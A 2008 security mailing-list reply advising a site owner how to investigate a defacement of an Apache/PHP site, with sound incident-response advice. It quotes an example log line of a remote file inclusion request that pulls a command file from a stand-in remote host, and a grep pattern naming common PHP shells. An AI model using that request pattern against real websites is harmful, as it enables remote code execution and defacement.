Re: Hacked by aLpTurkTegin, help patching this hole
- From: yummy <animalstastegood@xxxxxxxxx>
- Date: Sun, 25 May 2008 20:03:49 -0400
What user ownership was the hacked files, the user account, or the webserver?
In my experience if it was the user account, then there was a weak
password and it was bruteforced. Check the ftp logs for file uploads
for that user account.
If it was owned by the webserver, then there is probably an
exploitable php code on the site and usually it is due to a remote
file inclusion.
Check the apache domlogs, you might get lucky and find something.
RFI entries often look sometihng like:
69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc
.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt??
HTTP/1.1" 200 - "-"
In that above example, the php file "settings.inc.php" is vulnerable
and allows for the code in a php file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a phpshell.
Of course this is just an example, you'd have to find what is being
exploited by what the others have suggested...
Sorry, This is kinda long winded and pretty much what everyone else
said, but I have to deal with annoying defacement of sites everyday.
People that do that really bug me, plus i'm bored right now. :)
One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent alot of naughtyness
from happening.
I like to check also for perl procs running as the webserver id,
worldwritable directories, and phpshells located in user accounts.
find /home/useraccountname/public_html/ -type d -perm 777
will locate insecure directories.
The following oneliner will find many common phpshells:
find /home/*/public_html -type f -print0 | xargs -0 egrep
'(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'
it may take quite a while to complete depending on how many files
there are on the server.
My money is on an outdated php CMS/forum like phpbb, etc.. like
everyone else mentioned...
On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa@xxxxxxxxxxxxxxx> wrote:
Our website was defaced by aLpTurkTegin. We are running apache, php ect. Does anyone know how this hacker is getting in and what I can do to prevent this?
Our main web directory had all but one file deleted and hackedIndex.php, a.asp(a 0 byte file) and trustscn_put_test2 were placed into the main directory. The fact that the webserver served hackedindex.php makes me think its a apache web server flaw.
Any comments, suggestions?
Thanks, -D
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes
in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes
in Securing Web Applications
Find out now! Get Webinar Recording and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
- References:
- Prev by Date: RE: Kaseya
- Next by Date: RE: Dangerous in using nmap for AS/400 730 machine configured with 3 ASPs?
- Previous by thread: Re: Hacked by aLpTurkTegin, help patching this hole
- Next by thread: Wireless pen-test Cisco WPAv1 with PEAP and client side cert verification
- Index(es):
Relevant Pages
|
Loading
